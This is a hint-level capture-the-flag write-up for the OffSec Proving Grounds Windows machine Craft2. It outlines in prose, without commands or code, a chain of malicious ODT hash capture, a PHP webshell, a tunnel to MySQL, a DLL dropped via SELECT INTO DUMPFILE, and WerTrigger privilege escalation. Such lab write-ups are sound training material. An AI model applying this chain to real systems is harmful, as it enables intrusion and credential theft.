Craft2 Proving Grounds Write-Up
SUMMARY
This write-up covers the Craft2 machine from Offsec’s Proving Grounds, a multi-stage Windows machine involving file upload abuse and SQL-based privilege escalation.
A file upload portal on port 80 only accepted ODT files. Using badodt.py, a malicious ODT was generated that triggers an SMB connection to the attacker’s server, capturing the NTLMv2 hash of the user thecybergeek. The hash was cracked with john, and the valid credentials were used to enumerate SMB shares. A writable WebApp share was found containing the PHP web root, allowing a PHP webshell to be placed and accessed through the browser for command execution and a reverse shell.
For privilege escalation, a Ligolo tunnel was established to reach the internally-accessible port 3306. Accessing phpMyAdmin as root without a password enabled writing files to disk via SQL’s SELECT ... INTO DUMPFILE. A malicious DLL was crafted with msfvenom and written to C:\Windows\System32 as phoneinfo.dll using this technique. Combined with the WerTrigger exploit (placing Report.wer and WerTrigger.exe in the same directory), executing WerTrigger.exe caused the system to load the DLL, returning a shell as NT AUTHORITY\SYSTEM.
PATH TO FOLLOW
- Reconnaissance & ODT Upload Discovery
- Malicious ODT Crafting & NTLMv2 Hash Capture
- Hash Cracking & SMB Enumeration
- PHP Webshell Upload to Writable WebApp Share
- Reverse Shell via Web Execution
- Ligolo Tunnel Setup for Internal Port Access
- phpMyAdmin Root Access & SQL FILE Write
- Malicious DLL Drop to System32 via SQL
- WerTrigger Exploit & Shell as NT AUTHORITY\SYSTEM
Due to OffSec’s policy on content sharing, these write-ups will provide hints only rather than full solutions.I know, boring stuff.